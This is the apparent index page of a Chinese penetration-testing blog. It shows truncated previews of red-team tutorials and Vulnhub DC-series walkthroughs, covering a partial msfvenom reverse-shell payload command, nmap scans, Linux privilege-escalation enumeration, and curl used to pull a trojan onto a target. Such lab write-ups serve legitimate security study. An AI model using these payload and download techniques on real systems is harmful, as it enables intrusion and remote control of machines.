HackerGu‘s Blog-致力于网络安全技术研究HackerGu‘s Blog

天道酬勤
Msf和CS上线不出网的机器-HackerGu‘s Blog
Red Team

Msf和CS上线不出网的机器

Gu阅读(74)评论(0)赞(0)

内网中的很多机器是不可以出网的,那该如何在Msf和CS中上线呢? MSF 我们的目标机器是一台linux服务器,我们先生成elf马。 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=1...

CFS靶机—多层内网渗透靶机-HackerGu‘s Blog
网络安全

CFS靶机—多层内网渗透靶机

Gu阅读(77)评论(0)赞(1)

  CFS靶机搭建—https://www.anquanke.com/post/id/187908#h2-10 靶机搭建 靶机搭建是我最头疼的地方,下面写一下配置的关键点。 在vm虚拟机中,最为重要的就是这里:虚拟网络编辑器 其中...

【Vulnhub】— DC-4-HackerGu‘s Blog
网络安全

【Vulnhub】— DC-4

Gu阅读(32)评论(0)赞(0)

主机发现 在kali中使用netdiscover,发现机器192.168.234.179 端口扫描 使用Nmap,利用命令nmap -sV -A 192.168.234.179 --script=vuln root@kali:~# nmap...

【Vulnhub】—  DC-3-HackerGu‘s Blog
网络安全

【Vulnhub】— DC-3

Gu阅读(38)评论(0)赞(1)

  主机发现 DC-3靶机的配置过程中出现了一点点的小问题,靶机一直寻找不到IP地址,看了网上大佬的解释,应该是网卡不匹配的原因,于是利用linux系统的拯救模式修改了网卡的配置信息,重启网卡,重启机器便获得了靶机的IP地址。待我...

利用bssid进行WiFi模糊定位-HackerGu‘s Blog
网络安全

利用bssid进行WiFi模糊定位

Gu阅读(36)评论(0)赞(0)

  通过WiFi的bssid,我们可以对目标机器进行一个大致的定位,并获得其他意料之外的信息。 查看电脑能搜索到的所有WiFi netsh wlan show networks mode=bssid 经过实际的测试,在电脑联网状态...

【Vulnhub】—  DC-2-HackerGu‘s Blog
网络安全

【Vulnhub】— DC-2

Gu阅读(38)评论(0)赞(1)

主机发现 老样子,还是使用netdiscover 找到其IP为192.168.234.177 端口扫描 使用Nmap:nmap -Pn -A 192.168.234.177 root@kali:~# nmap -Pn -A 192.168....

Linux提权相关的基础命令-HackerGu‘s Blog
提权

Linux提权相关的基础命令

Gu阅读(65)评论(0)赞(0)

记录一下关于Linux提权相关的命令 获取系统信息 cat /etc/issue 查看发行版 cat /etc/*-release 查看发行版 cat /proc/version uname -a 查看内核版本 rpm -q kernel ...

Curl在渗透测试中的应用(LOLBAS)-HackerGu‘s Blog
Red Team

Curl在渗透测试中的应用(LOLBAS)

Gu阅读(78)评论(2)赞(2)

Curl介绍 curl是一个利用URL语法在命令行下工作的文件传输工具,1997年首次发行。它支持文件上传和下载,所以是综合传输工具。 curl可以用于处理远程服务器上的文件。 例如,我们可以在目标机器上利用curl下载远程服务器的木马文件...

Metasploit—端口转发-HackerGu‘s Blog
网络安全

Metasploit—端口转发

Gu阅读(50)评论(0)赞(0)

拿下目标服务器,开始对内网进行探测。 此时,服务器是公网IP,但是我们想要访问内网中 192.168.234.160 的3389端口,登上远程桌面。由于在内网,我们无法直接连接,所以我们需要端口转发,将192.168.234.160机器的3...

专注黑客技术的研究

联系我们联系我们